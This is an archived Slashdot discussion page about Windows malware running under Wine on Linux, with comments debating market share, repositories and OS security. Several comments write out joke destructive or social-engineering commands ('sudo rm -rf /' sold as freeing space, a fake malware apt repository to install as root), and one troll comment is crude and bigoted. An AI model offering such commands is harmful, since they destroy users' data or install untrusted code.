Beta
×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Now Linux Can Get Viruses, Via Wine

timothy posted more than 4 years ago | from the many-humans-do-the-same dept.

Security 343

fsufitch writes "Wine has advanced enough to make Linux not immune to Windows viruses. However, just like many Wine applications, it takes a bit of effort to get the program off the ground. Also, just like some Windows programs running via Wine, not all features may work — in this case, the crippling of the system, immunity to the task manager, identity theft, etc."

cancel ×

343 comments

Sorry! There are no comments related to the filter you selected.

marketshare (3, Insightful)

sopssa (1498795) | more than 4 years ago | (#29858417)

Haven't it always been pretty clear that Wine could run Windows viruses, as long as they don't use some weird low-level tricks (which admittedly many do)?

But for that matter, Linux doesn't have malware only because it's desktop share is next to nothing (not the same amount atleast, there are Linux viruses out too). Mac OSX has been getting more and more viruses lately as it's marketshare has been growing. So would Linux aswell if it ever gained more users.

As long as the OS isn't completely locked down from the user, there will be malware. Windows, Mac, or Linux cant defend you from that. But none of us really want a locked down OS. And as long as the users are stupid their computers will get infected.

It's just about the marketshare.

Re:marketshare (3, Funny)

MadFarmAnimalz (460972) | more than 4 years ago | (#29858449)

Haven't it always been pretty clear that Wine could run Microsoft Office, as long as they don't use some weird low-level tricks (which admittedly it does)?

But for that matter, Linux doesn't have MS Office only because it's desktop share is next to nothing (not the same amount atleast, there are Linux office suites out too). Mac OSX has been getting more and more office suites lately as it's marketshare has been growing. So would Linux aswell if it ever gained more users.

As long as the OS isn't completely locked down from the user, there will be office suites. Windows, Mac, or Linux cant defend you from that. But none of us really want a locked down OS. And as long as the users are stupid their computers will get infected.

It's just about the marketshare.

FTFY

Windows virus needs help to limp onto WINE (4, Insightful)

AliasMarlowe (1042386) | more than 4 years ago | (#29858719)

So WINE can get a virus intended for Windows, if you jump through some hoops to help the virus along. Color me unworried.

What can a Windows-targeted virus in WINE do to a Linux system, other than hang around looking impotent? Most of the target DLLs and other windows hidey-holes don't exist in WINE. Even if it finds a place to lurk, it's unlikely that it could hit the Linux system files or boot loader, or perform keylogging outside WINE or snoop on private files. A very crude "wipe drive C:" type virus might molest your WINE environment (your data files are elsewhere, of course), but that's about all. Even if the virus were specifically tailored for WINE on Linux, a successful attack would rely on user stupidity even more blatant than Windows viruses must depend on.

TFA even commented on how easy it is to dispose of the malware, even after spending some effort helping it to limp onto your system.

Re:Windows virus needs help to limp onto WINE (1)

GravityStar (1209738) | more than 4 years ago | (#29858879)

It might give virus developers ideas of creating neat, cool multiplatform mutating viruses.

Re:Windows virus needs help to limp onto WINE (-1, Troll)

Anonymous Coward | more than 4 years ago | (#29858929)

Filipina women will give you viruses like that. Their black syph will make your dick fall off. Don't marry Filipinas!

-- an ex-USN sailor

Re:marketshare (5, Insightful)

sakdoctor (1087155) | more than 4 years ago | (#29858455)

But none of us really want a locked down OS

WTF?
Microsoft totally fucked up the principle of least privilege from day one. If they hadn't, the damage done by viruses/worms in the history of personal computing, would have been an order of magnitude less.

Re:marketshare (5, Insightful)

bhtooefr (649901) | more than 4 years ago | (#29858923)

The problem is, for a home computer, you are your own sysadmin.

And then the dancing bunnies problem comes into play.

User: "Oooh, I can download this to see dancing bunnies." *downloads and executes malware*
Malware: *tries to install*
OS: "Malware needs root access to install. Please enter your root password." (Windows version of this would be "Cancel or Allow.")
User: *enters root password*
Malware: *infects system*
OS: *pwned*
User: *pwned*

Re:marketshare (0)

sopssa (1498795) | more than 4 years ago | (#29859129)

And even more so, malware doesn't even need administrator access in majority of cases. Keylogging, sending spam and so on work just fine without admin too (and so it would on Linux aswell)

Re:marketshare (4, Funny)

Nerdfest (867930) | more than 4 years ago | (#29859253)

Yeah ... but dancing bunnies .... it is a tough call.

Linux's distribution model helps though (5, Insightful)

brunes69 (86786) | more than 4 years ago | (#29858475)

The way Linux software is distributed, makes it much less likely to get a virus. You know how many applications I have downloaded from random websites in the past 2 years for my Linux system? Maybe, 2. All of the rest are in the centrally managed, (hopefully) certified virus-free application repository, which is free for all.

The idea that a Linux user would download random stuff from a torrent or website is a pretty foreign concept. For me, and moth others, if it isn't in the repository, I don't bother - because there is probably something in the repository that suits my needs just as well or better anyway.

Re:Linux's distribution model helps though (1, Interesting)

Anonymous Coward | more than 4 years ago | (#29858665)

certified quite literally the repositories for most distros use package signing of some sort, so even mirrors of them are guaranteed to be unaltered.

Re:Linux's distribution model helps though (1)

cenc (1310167) | more than 4 years ago | (#29859009)

That is a big big difference in the MS software culture vs. linux or just open source in general. Software is signed, and from day one users are bombarded with notices about the package signing and instructions on how to use them. Until I started using open source, I don't remember ever once being told to checksum windows software before installing.

I have even on occasion grabbed torrents of distros from relatively shady torrent sites because they had more seeds or whatever closer to my home, unconcerned about the final download because I had the signature from a trusted source to check once it was down to insure it was for real. The simple checking culture makes malware infiltration difficult (although not impossible) in to open source software.

Re:Linux's distribution model helps though (1)

lukas84 (912874) | more than 4 years ago | (#29859215)

Then you're quite new to the Linux game.

Debian didn't sign anything for a long, long time. Or Slackware. Or Gentoo. Of course this has all been fixed by now, but Linux sure wasn't what started the whole "sign everything" trend.

While Windows has been displaying a lot of warnings with missing Authenticode signatures starting with Windows XP.

Re:Linux's distribution model helps though (1)

cenc (1310167) | more than 4 years ago | (#29859351)

I have never been a Debian user, but I have been using open source software for better than 10 years and I recall back then everything I was running being signed at least in Red Hat / rpm circles. I believe most things where signed because there was always the possibility of a download being corrupted from a flaky Internet connection, more than security concerns.

Re:marketshare (3, Insightful)

wizardforce (1005805) | more than 4 years ago | (#29858495)

So what you're saying is that Linux should be just riddled with various types of malware in the server market because it is both the dominant player in that market and is a significant target considering the server market's importance. Reality seems to disagree with you.

Re:marketshare (5, Insightful)

Anonymous Coward | more than 4 years ago | (#29858611)

To be fair, there's a significant effort to install backdoors/trojans on poorly configured linux machines, but the issue is that they're a much more difficult target as servers do not browse websites with IE nor do they open every attachment you send them via email.

What makes most machines insecure is the users, and since a server normally has only 1 very tech-saavy user, the only openings are in poorly configured services. I know that I had phpbb for a long time, and one day I put in a game playing mod (had some goofy things like achievements and little trophies), and I got hacked via a google search.

Fortunately the guy who installed it didn't finish off his attack by clearing his own history, and the server wasn't running as root, so he only got as far as screwing with the main page.

To say that the server market isn't continually targeted is disingenuous. It's just harder because it isn't operated by a ton of idiots (well, most of the time anyway).

Re:marketshare (1, Funny)

Anonymous Coward | more than 4 years ago | (#29859385)

I should clarify that "hacked by a google search" is in reference to the fact that he used google to find the vulnerable service on my server, then proceeded to actually attack me using said vulnerability.

Sorry, I just realized how silly that sounded...

Re:marketshare (1)

0ld_d0g (923931) | more than 4 years ago | (#29859225)

Server admins are 10 orders of magnitude more paranoid about security than the average Windows user who clicks on random ads and gets infected. Which BTW, Servers are never used for. (casually browsing the net)

Re:marketshare (1, Interesting)

Anonymous Coward | more than 4 years ago | (#29858625)

But for that matter, Linux doesn't have malware only because it's desktop share is next to nothing

Then why do linux server not have viruses? Windows servers do, and Linux has a much bigger market share.

Re:marketshare (2, Insightful)

shentino (1139071) | more than 4 years ago | (#29859057)

Windows, however, is bigger overall.

And you don't really need a beefy server in your botnet. A desktop will do just fine.

Re:marketshare (3, Insightful)

0100010001010011 (652467) | more than 4 years ago | (#29858755)

A link to all those hundreds of OS X viruses that are coming out?

Re:marketshare (2, Insightful)

wintersdark (1635191) | more than 4 years ago | (#29858839)

Thinking that you're safe running OSX is very foolish. It IS more secure than Windows, but it can get viruses too. As OSX increases in market share, you will find more viruses appearing for it too. It'll take a little longer to get started - Everyone got great Intro Virus Production 101 classes in grossly insecure older versions of Windows, after all. OS X is indeed a more secure operating system, but it is not an invincible one. Assuming you are and will always be safe because you're running it is a very bad idea.

Re:marketshare (1)

aitikin (909209) | more than 4 years ago | (#29859007)

Yes, but until a virus comes out for it (which they haven't yet, with the possible exception of proof of concepts) and when it does, everyone will know immediately cause news of it'll be all over the place.

Re:marketshare (2, Informative)

lukas84 (912874) | more than 4 years ago | (#29859227)

Infected copies of Apple's iWork are already floating around.

http://gizmodo.com/5139116/os-x-iwork-trojan-revamped-repackaged-rereleased-in-photoshop [gizmodo.com]

Re:marketshare (1)

ctmurray (1475885) | more than 4 years ago | (#29859319)

So you get a virus from an pirated copy of iWorks. (and Photoshop). And you have to give the program root access. Hmm....

Re:marketshare (1)

lukas84 (912874) | more than 4 years ago | (#29859357)

How's that different from the usual infection vectors on Windows?

User downloads program from shady site. Executes it and agress to the UAC prompt. Bam. All done.

Re:marketshare (0)

Anonymous Coward | more than 4 years ago | (#29859255)

You mean once it's discovered.....

Re:marketshare (2, Interesting)

Stupendoussteve (891822) | more than 4 years ago | (#29859403)

OS X Snow Leopard notices the two trojans which are in the wild.

They didn't do anything extreme, and they were installed by stupid users pirating software, but they do exist.

Re:marketshare (5, Funny)

zmollusc (763634) | more than 4 years ago | (#29859013)

If I was teh evil malwares writer, I would target OSX as its users have piles of cash. The trick would be to make your pop-up so beautifully coloured, shaded, animated and raytraced that the style-obsessed mac user would fill in his credit card details immediately.

Re:marketshare (1)

Stupendoussteve (891822) | more than 4 years ago | (#29859381)

It is foolish.

Just as foolish as thinking you're automatically safe running Linux, though admittedly repositories remove a lot of the danger. OS X and Linux generally do not suffer from the second-you-get-online worms that Windows has been known for, but they are not immune to malware if the user is uneducated or unconcerned. This will always be the best attack vector.

Re:marketshare (1)

sopssa (1498795) | more than 4 years ago | (#29859181)

Google query [google.com]

Re:marketshare (1)

0100010001010011 (652467) | more than 4 years ago | (#29859309)

That looks like Malware. Stuff that people install voluntarily because of social engineering.

I could put:
-
#!/bin/bash
sudo rm -rf /
-
into a file tell you that it'll give you more free hard drive space.

I'm talking about Viruses & Trojans. The stuff that is automated and requires 0 user interaction. The stuff that infects an XP SP1 machine with in 20 minutes of being on the internet. [securityfocus.com]

Re:marketshare (1)

sopssa (1498795) | more than 4 years ago | (#29859345)

Now a days you don't really get automated viruses on Windows either, I haven't got any since something like Windows 98. Most of automated infections usually come from a websites exploiting Flash or PDF too, and that's not really Windows fault.

(* excluding whatever it was that Conficker was exploiting an year ago, but that too was patched many months before)

Re:marketshare (2, Informative)

cheftw (996831) | more than 4 years ago | (#29859415)

That looks like Malware. Stuff that people install voluntarily because of social engineering.

I could put:
-
#!/bin/bash
sudo rm -rf /
-

I remember reading that it's better practice to write that

sudo rm / -rf

since putting your switches at the end (especially on rm) makes it easier to catch stupid mistakes (like hitting return early).

Not that in your case it's a huge deal.

Re:marketshare (1, Offtopic)

Storchei (723338) | more than 4 years ago | (#29858773)

Haven't it always been pretty clear that Wine could run Windows viruses, as long as they don't use some weird low-level tricks (which admittedly many do)?

But for that matter, Linux doesn't have malware only because it's desktop share is next to nothing (not the same amount atleast, there are Linux viruses out too). Mac OSX has been getting more and more viruses lately as it's marketshare has been growing. So would Linux aswell if it ever gained more users.

As long as the OS isn't completely locked down from the user, there will be malware. Windows, Mac, or Linux cant defend you from that. But none of us really want a locked down OS. And as long as the users are stupid their computers will get infected.

It's just about the marketshare.

I think you simply did not get the idea of open source. Of course there can be viruses for Linux and open source OSs, but which is the probability they survive? Why? Because of the very core of open source success, EVERYONE who wants can take a look at the code and improve it. Beyond that, who will create a virus for a soft built by her/himself?? I think as Linux/open source OSs gain market they are more exposed, but their essence make then more reliable and protected of malicious code. Of course they are not perfect, but they are by far more efficient/reliable than commercial OSs. I think the skills of a person who intends to write a virus for linux/open source OSs should be BY FAR higher than the skills of a person who intends to write a virus for Windows/Mac, just because linux/open source code is constantly reviewed by millions of people thus the virus writer must be clever than those millions to find a hole nobody else did. In summary, I find linux/open source OSs BY FAR more reliable than windows/commercial OSs. There is no perfect OS, there is a suitable one instead. I think if people takes care of the software they use, among other things, the possibilities of getting a virus are minimum. Regards!

Parallels Virtual Machine (1)

reporter (666905) | more than 4 years ago | (#29858775)

The issue of viruses infecting Linux from a Windows program running via Wine is really a non-issue. Nowadays, you can spend a small amount of money and buy a Parallels application that emulates a real Windows machine. This virtual machine is fully isolated from the rest of the Linux system.

I use Parallels Desktop 4.0. It works great on my MacBook Pro. I can run almost any Windows program. The downside is that, of course, the Windows virtual machine is slower than a real Windows box. However, what is important to me is that Windows viruses are trapped inside the virtual machine.

I like to say, "The Power of Mac. The Utility of Windows. Thanks to Parallels." No. I don't work for Parallels, but I love this product.

Re:Parallels Virtual Machine (0)

Anonymous Coward | more than 4 years ago | (#29859353)

Emulators have existed since I was born. "nowadays"?
Also, "spend money"? Clearly a Mac user.

Re:Parallels Virtual Machine (2, Informative)

cheftw (996831) | more than 4 years ago | (#29859449)

You presume that it is impossible to break out of a virtualised environment.

A quick google will turn up papers which may diminish your naivety.

Also IMHO the way to go is VirtualBox (FOSS and made by Soracle).

not just marketshare (4, Interesting)

RiotingPacifist (1228016) | more than 4 years ago | (#29858799)

Ubuntu 9.10 will start sandboxing desktop programs (starts with xpdf i think), other distros do already/will follow. I think that sandboxing can (and if required will) criple malwares abilities (e.g can't listen on network ports, can't insert itself to bootsequence, can't touch chrome tabs that are connected to https sites) leaving them unable to do most malwarey things without permission and can work like an AV that is designed right (e.g warn users that they are about to do something very stupid, only when they are not everytime they run a 3rd party app/widget, without having to scan binaries)

Re:not just marketshare (3, Insightful)

lukas84 (912874) | more than 4 years ago | (#29859239)

You mean just like Internet Explorer has been doing since the End of 2006?

Re:not just marketshare (0)

Anonymous Coward | more than 4 years ago | (#29859435)

I assume you're referring to the dialog that says "Internet Explorer is not your default browser. Do you want to compromise your system by making it your default browser now?"

Re:marketshare (0)

Anonymous Coward | more than 4 years ago | (#29858865)

Haven't it always been pretty clear that Wine could run Windows viruses, as long as they don't use some weird low-level tricks (which admittedly many do)?

But for that matter, Linux doesn't have malware only because it's desktop share is next to nothing (not the same amount atleast, there are Linux viruses out too). Mac OSX has been getting more and more viruses lately as it's marketshare has been growing. So would Linux aswell if it ever gained more users.

As long as the OS isn't completely locked down from the user, there will be malware. Windows, Mac, or Linux cant defend you from that. But none of us really want a locked down OS. And as long as the users are stupid their computers will get infected.

It's just about the marketshare.

If it's all down to marketshare (and I'm not saying that isn't a factor), then why is it that there are large numbers of Linux servers, yet only a very small number of exploits? Also, it might be being picky, but where is the evidence that MacOSX has been getting more and more viruses? Agree with you that the weakest link is and always will be the user, but that's not the entire story.

Re:marketshare (2, Interesting)

cenc (1310167) | more than 4 years ago | (#29859149)

I have been running linux machines for going on 10 years now, including my home, all the computers in my office, dozens of servers with every imaginable piece of software and configuration possible (some secure some insecure) in that time, I as yet to ever find one virus, malware, or evidence that a serious attempt was ever made any progress.

The market share argument just does not cut it. You would think there would be at least one well know case in the wild by now of a linux virus spreading to other linux machines in a sustained and ongoing manner.

The best we have are 'just so' cases. The software, permissions, user, network, and so on had to be just so in order for virus or malware to work. But a general widespread linux virus? Where are they?

Re:marketshare (1)

amilo100 (1345883) | more than 4 years ago | (#29859317)

You would think there would be at least one well know case in the wild by now of a linux virus spreading to other linux machines in a sustained and ongoing manner.

Have you ever thought about how viruses spread? A lot of Windows users get viruses or adware by downloading a program from a website (e.g. P2P programs, games, etc...). Most Linux users get their software via official repositories - which removes that method in which viruses spread. When last did you download a Cracked Copy of a Linux game of software package?

Re:marketshare (1)

hcmtnbiker (925661) | more than 4 years ago | (#29859327)

The market share argument just does not cut it. You would think there would be at least one well know case in the wild by now of a linux virus spreading to other linux machines in a sustained and ongoing manner.

What? That's exactly why market-share is so important. You're assuming they can find other linux machines. And how would they do this? How would it discover other machines? This is hard enough to do with a windows host, let alone one that has ~1/100 the market-share.

Re:marketshare (1)

cenc (1310167) | more than 4 years ago | (#29859371)

That would be fairly easy to determine. I just need to have a look at my web site server logs to see all the information about my visitors OS, the version, and so on, not to mention you have about a 60% chance of any given server being linux.

Re:marketshare (2, Interesting)

dontmakemethink (1186169) | more than 4 years ago | (#29859339)

Think of it from a the perspective of the imps making the viruses (and no, it's not 'virii'). Pretend you're a spineless asshole that wants to cause as much damage as possible. Do you use widespread tools to make a Windows virus with relative ease and hit the biggest user base, or do you spend much more time finding vulerabilities in better OS's and hit a much smaller user base?

99 times out of 100 it's the former scenario that plays out. Doesn't mean you needn't run anti-virus software on OS X, for example, but you can have much more confidence that nothing will get past it. Running XP doesn't scare me, it's the number of viruses that Avast catches that scares me.

Re:marketshare (2, Interesting)

zigmeister (1281432) | more than 4 years ago | (#29859377)

I mostly agree. However Linux (and Mac) are much more immune to what are strictly viruses. What they are not much more immune to are trojans*, which I think constitute ~80-90% of infected Windows desktops. Here's my theory to dispel the myth of how robust Linux is(when in the hands of a typical user): Write a malware program that is a variant on the dancing bunnies. Put it up for download. User must have dancing bunnies or else. User clicks to download, then selects Open with Package Manager. User enters root password to install then since security signature is missing must enter it again. Malware program now installed.

*I'm aware of least privilege. However with more and more of the total desktop market being in the home, most users will have their root passwords (i.e. not in a corporate environment) and see no difference between entering that and clicking continue on a bunch of UAC prompts. To make matters worse they will be conditioned to "Force install" since a decent amount of apps that are safe that they want don't provide security signatures either. E.G.: World of Goo, Hulu Desktop Client, commercial games if they ever come etc.

Re:marketshare (0)

Anonymous Coward | more than 4 years ago | (#29859393)

Macs don't have viruses, they have Trojans which are something completely different. A virus exploits a whole in the operating system, a trojan exploits the person sitting in front of the computer. If you install a "video codec", there's no way (without an anti-virus program) for the computer to know that it's bad.

It's like a what? (3, Interesting)

cjfs (1253208) | more than 4 years ago | (#29858471)

A virus run in Wine is akin to taking a ferocious tiger out of the jungle, paralyzing it, then hooking up all of its nerve endings to virtual jungle simulator. It's not a perfect simulation, though, so the jungle maybe doesn't look right, and plus there's an omnipotent power that can change anything that goes on in the simulation, or even destroy it and the tiger's consciousness with a few twitches of his fingers. Now that's power.

Power that's generated by feeding the dead tigers back to other tigers so we can use their body heat to generate MORE POWER!

On second thought, lets stick to car analogies.

feeding the dead tigers back to other tigers (1)

snikulin (889460) | more than 4 years ago | (#29858843)

Felinae spongiform encephalopathy!

Just waiting for this e-mail (4, Funny)

fluch (126140) | more than 4 years ago | (#29858497)

This is a lonesome linux virus. Please add

deb http://malware.server.ru/debian [server.ru] experimental non-free

to your /etc/apt/sources.list and excecute "apt-get my-first-virus" as root. Thank you very much vor your cooperation.

Re:Just waiting for this e-mail (4, Funny)

sakdoctor (1087155) | more than 4 years ago | (#29858519)

non-free?

I only install FLOSS malware.

Re:Just waiting for this e-mail (4, Funny)

Anonymous Coward | more than 4 years ago | (#29858563)

Me too, I won't compromise my freedom just to be part of a botnet.

Free alternative: http://www.gnu.org/fun/jokes/evilmalware.html

Re:Just waiting for this e-mail (2, Funny)

ozamosi (615254) | more than 4 years ago | (#29858857)

This is a lonesome linux virus. Please add

deb http://malware.server.ru/debian [server.ru] experimental non-free

to your /etc/apt/sources.list and excecute "apt-get my-first-virus" as root. Thank you very much vor your cooperation.

Yeah, I run Fedora...

Re:Just waiting for this e-mail (1)

wizardforce (1005805) | more than 4 years ago | (#29858979)

Yeah, I run Fedora...

wget http://malware.server.ru/debian.deb [server.ru]

sudo alien -r debian.deb

Re:Just waiting for this e-mail (0)

Anonymous Coward | more than 4 years ago | (#29859281)

fedora doesn't have alien, you insensitive clod!

Linux on a bender (5, Funny)

Anonymous Coward | more than 4 years ago | (#29858505)

What do you expect when Linux gets drunk on Wine and wakes up with Windows it's bound to have caught something.

Precautions I take (0)

Anonymous Coward | more than 4 years ago | (#29858521)

I have a user called wine-o that I only use to run wine, and alias wine='echo switch to wine-o' in the account I usually use.

I wish I had used a username other than wine-o because I don't think it looks that good when I send resumes out last saved by 'wine-o'.

Hooray! (1, Funny)

Greyfox (87712) | more than 4 years ago | (#29858529)

It's like I used to not be able to get herpes, AIDS or the flu and NOW I CAN! Thanks, wine team!

That's the problem with Wine... (4, Funny)

Interoperable (1651953) | more than 4 years ago | (#29858533)

I always have to configure the programs so much before they run. It really defeats the purpose of a virus if I have to configure it so much first. Once Linux can run Windows viruses with a one-very-poorly-chosen-click install process I might make the switch. Besides, I can just run my FOSS software under Windows and still have access to all of the proprietary viruses that are only made for windows.

Executables under wine (1)

Psicopatico (1005433) | more than 4 years ago | (#29858561)

Didn't read TFA yet (already slashdotted?), but I think I've encountered one working "unwanted program" under Wine lately.

If I recall correctly, the vector was the setup or the program itself for a peer to peer TV system, which I wanted to try under wine.

Once launched, some unwanted processes kept popping out, and the command reported by ps was stuff like "wine C:\WINDOWS\TEMP\asasaazasdax.exe" or similar.
Suspect at first look.

Actually I don't remember which one between "killall wine" or "kill -KILL " solved the issue.

Re:Executables under wine (1)

TheRaven64 (641858) | more than 4 years ago | (#29858805)

It's not entirely surprising. You can protect yourself against Windows-designed malware by restricting the filesystem that WINE has access too, but that doesn't protect you against malware that is intended to be cross-platform. Once a program has used WINE as a loader, it can still issue Linux system calls directly (WINE can't catch system calls, only library calls) and break out of the WINE sandbox.

Linux? (2, Interesting)

niko9 (315647) | more than 4 years ago | (#29858573)

Preface: I'm Debian GNU/Linux user of 10 years, but not a professional computer geek. I use GNU/Linux to get work done.

I thought Linux was just a kernel? Should not the headline read "A Linux distribution that has Wine installed *might* be vulnerable to Windows viruses?"

Re:Linux? (-1, Flamebait)

Anonymous Coward | more than 4 years ago | (#29858709)

Shut up, you pedantic faggot.

Re:Linux? (-1, Flamebait)

Ant P. (974313) | more than 4 years ago | (#29858903)

Mod parent AC up.

"...not all features may work - ..." (0)

Anonymous Coward | more than 4 years ago | (#29858589)

"...in this case, the crippling of the system, immunity to the task manager, identity theft, etc."

Yes, identity theft was always a great feature, just like immunity to the task manager. What the h**l does that even mean? Geez.

Also: I hereby tag this: HAHAHAHA

Look to Apple users using VM (4, Interesting)

Ilgaz (86384) | more than 4 years ago | (#29858597)

If you look deeper to Apple users virtual machines (Sun Virtual Box etc.) , lots of them doesn't bother to install some free AV, a basic one saying "it is virtual anyway". When you talk about how evil things can be done while their virtual machine up and what kind of trouble they may get into if they have bad luck, they install a free AV to Windows.

If you have trouble convincing such people, just use plain logic: It can even run some games let alone a worm/trojan/virus.

It is not in the culture you know...

The only place... (1)

digitalderbs (718388) | more than 4 years ago | (#29858629)

...you should be able to get a virus from wine is at church.

Re:The only place... (1)

corbettw (214229) | more than 4 years ago | (#29858957)

All right Father, think it's time for you to leave the alter boys alone.

Experiments (4, Informative)

Aquaseafoam (1271478) | more than 4 years ago | (#29858647)

I work as a sysadmin at a company making a slow switchover to Linux, and I've experimented with this a bit. You can greatly, greatly limit the damage any virus can cause through wine by unmapping it's Z drive from the wine configuration menu. By default, wine maps / to Z. I can see why they did this, (wine can only run applications within a mapped drive) but it likely needs to be undone across the board. The best alternative would be to create a unhidden wine folder in the user's home directory and map that in wine. If Z is left mapped to /, then a windows virus can run rampant all throughout your system.

Re:Experiments (1)

ElKry (1544795) | more than 4 years ago | (#29858713)

If Z is left mapped to /, then a windows virus can run rampant all throughout your system.

... with your current user's permissions. Which I grant you is bad enough.

Re:Experiments (1)

jedidiah (1196) | more than 4 years ago | (#29859161)

The main problem is still "running amok" in /home. / won't get you much.

Mac Office was a bigger headache for me (2, Interesting)

Savior_on_a_Stick (971781) | more than 4 years ago | (#29858721)

Users with Office installed seem to end up documents infected with a macro virus.

While the Macs are themselves unaffected, they pass along the infection to windows boxes.

That's usually the point where they are found and removed, but the general lack of av for Mac (few choices and most lack functionality/accuracy) along with the perception of macs as immune means that av is rarely installed on macs.

When it is, AV_App_X doesn't detect the malware, whereas AV_App_Y detects, but can't clean, and AV_App_Z has no realtime scanning.

Re:Mac Office was a bigger headache for me (1)

Totenglocke (1291680) | more than 4 years ago | (#29858875)

While the Macs are themselves unaffected, they pass along the infection to windows boxes. That's usually the point where they are found and removed, but the general lack of av for Mac (few choices and most lack functionality/accuracy) along with the perception of macs as immune means that av is rarely installed on macs.

Quite true. However, Symantic Endpoint Protection now supports OS X as well, so there's at least a decent (for business use, I'd never touch Symantec for personal use) AV program for Mac now. The hard part will be explaining to people why they need it.

I had a user the other day when I went to work on his machine who had removed AV - I mentioned the lack of AV and he goes "Well it's just on a separate workgroup, it's not on the domain". Well that separate workgroup still had internet access (even though technically it wasn't supposed to), which he knew quite well from all the im clients and browsing he'd done on that machine. After I installed AV on it I ran a scan and, surprise!, it had a dozen viruses. I'm actually surprised it wasn't more than that.... But yes, some people just aren't smart enough to realize that you need AV protection.

Re:Mac Office was a bigger headache for me (1)

mevets (322601) | more than 4 years ago | (#29859361)

The analogy between computer virus and human virus breaks down at responsibility. MS software is incredibly susceptible to viruses (viri?) because of clear business decisions they made. Market domination is a secondary effect; opportunity plays a huge role in this.

annecodote: after a friends car was stolen with his keys, he asked the police officer if he should change the locks on his house. The officer replied "Not to worry, if they were that ambitious, they would have a job"

They must have known what they unleashed, to be generous, 12 years ago. They chose to do it anyways, probably using the Ford Pinto (4 wheel toaster) business model.

If MS wants the few of us who doesn't use their software to insulate their systems, they should at least bribe us. $50/year and an open source virus scanner would be fine. I shouldn't have to join the norton/symantec/... protection racket simply because I might forward a "funny video" to some poor shmuck who has to use Windows.

Just get hacked, it is easier anyway (1, Insightful)

Anonymous Coward | more than 4 years ago | (#29858767)

In 1996, my Linux box was hacked in under 20 minutes of being online. The root account password was changed and my account was deleted (along with all my files). I reinstalled and learned about securing unix.

In 1998 my Linux box was hacked due to a 3 month behind-patch version of bind. They dropped a perl script into /tmp and tried to gain root with a perl timing-to-root bug, which had already been patched on my system. A disconnected backup was used to validate all the files on the system and proved that only the named userid and /tmp/.sdfsdfs directory had been touched.

I don't run bind on an internet accessible machine anymore.

I haven't been hacked since, but I'm not so ignorant to believe that I can't be hacked. My plans for when I'm hacked revolve around discovering the cause and restoring from a complete system backup, then removing the vulnerability. I expect to be hacked, period. "I" is really "we" since I run servers for my company and for other companies.

Neither hacks were viruses, but they were just as bad and could have been much worse.

Linux isn't THAT more secure, it is just less targeted since Windows is 90%+ of the computers. Stop being so smug folks.

I think Apple is about to learn a real lesson with the iPhone being hacked constantly. Then Linux will be targeted.

Re:Just get hacked, it is easier anyway (4, Insightful)

argent (18001) | more than 4 years ago | (#29859051)

Linux isn't THAT more secure, it is just less targeted since Windows is 90%+ of the computers.

A properly configured UNIX client system is significantly more secure than any comparable Windows system, even if you don't run a firewall. There are two significant differences: Internet Explorer, and Services.

The security model of IE is inherently flawed and can not be fixed without breaking existing applications. Microsoft is unwilling to take that step.

Windows services are neither run from a superserver nor in virtually all cases do they allow binding to specific ports, and Windows networking (LAN Manager) requires having services with open ports.

These are fairly significant problems that can not be addressed without changes to Windows APIs that are unlikely to happen.

I think Apple is about to learn a real lesson with the iPhone being hacked constantly.

If someone has physical access to the system, all the software security in the world is useless. The iPhone is being attacked by the device's *owners*. These are *local exploits*, much more common and of much less concern than remote ones.

Re:Just get hacked, it is easier anyway (1)

jedidiah (1196) | more than 4 years ago | (#29859249)

> Linux isn't THAT more secure, it is just less targeted since Windows is 90%+ of the computers. Stop being so smug folks.

You're on f*cking crack. You're talking about BIND of all things. What does a normal user need with BIND?

Of course BIND is one of the most notorious Unix services out there. It and sendmail have a long history of problems.

Even in 1998, it was known as a STUPID thing to do.

The thing with Unix (and MacOS) is that once a stupid thing is exposed, companies,
distributors and end users tend to stop doing it. It doesn't fester like a boil
until it turns into some sort of life threatening infection.

Also, the problems with BIND or sendmail or even PHP are application problems that
can impact any Unix or any other OS that runs those applications. Since none of them
are subject to any sort of "monopoly coercsion" it's rather trivial to get rid of them
and possibly run an alternative if need be.

What do you run if msoffice is a wormfest?

It's 2009 and Windows users are still being infested with IE malware. Just avoiding
IE by itself can go very long way in helping n00bs keep their Windows boxes intact.

The smugness is entirely warranted.

When running Windows, it has always been best to minimize your use of Windows products.
This was true with Windows 3.1 and it's still true today. Microsoft remains worse than
anyone else in the industry (including Apple).

To be pedantic .. (1)

NoYob (1630681) | more than 4 years ago | (#29858785)

Linux doesn't have malware...

Yes it does: it's just very very rare.

A friend of mine bought a domain and within hours of getting it and starting it, someone put a rootkit on that damn thing before he could lock it down - yes, it was a Linux server hosting his domain. Yes, it's not malware per se as you would from surfing the web, but we shouldn't get complacent about Linux' absence of threats.

Re:To be pedantic .. (0)

Anonymous Coward | more than 4 years ago | (#29858941)

No offence, but I call your story bullshit. Most people are actually running their servers without configuring anything security wise for years. And yet there isn't any malware outbreak.
Don't blame linux for faulty software that would compromise any os it's running.

IT's a trap (1)

RiotingPacifist (1228016) | more than 4 years ago | (#29858831)

The site is already running evil code on my computer against my permission!

(before down-voting look at the top of TFA)

Great... (1)

ctrl-alt-canc (977108) | more than 4 years ago | (#29858885)

Now they can claim a 100% emulation of Windows.

Malware rise (2, Funny)

gmuslera (3436) | more than 4 years ago | (#29858891)

Thousands of Linux systems now are running windows virus. That new improvement in Wine made a lot of Linux users to intentionally install the last wine version and browse dangerous places using IE6 under it to see if they get lucky and get some virus. "I'm excited", said one linux user, "i managed to get 3 different virus, a worm, and you wont believe, my machine is now part of a botnet! Woohoo!".

Gee, sure is old news around here. (0)

Anonymous Coward | more than 4 years ago | (#29858925)

The magazine that introduced me fully into linux, (ie, it had CDs, which back in 2002, for me, at least, was next to impossible to download isos due to 56k and having to share the connection without a router) Linux Format, ran an article about how you can still hose your linux system if you ran an infected program under wine, if it did nasty things like delete files, osnap, bye bye home directory. If you ran it as root, bye bye linux system.

This was seven years ago.

Strongly misleading headline! (2, Insightful)

Hurricane78 (562437) | more than 4 years ago | (#29858943)

Yeah, it can run viruses, but "not all features may work -- in this case, the crippling of the system, immunity to the task manager, identity theft, etc.".

So in fact, it's not a virus anymore. It's just another program. The very point of being a virus is gone. Because the security settings still hold. (Unless you are retarded enough to run a Wine program as root. But in that case you're just asking for it anyway. ^^)

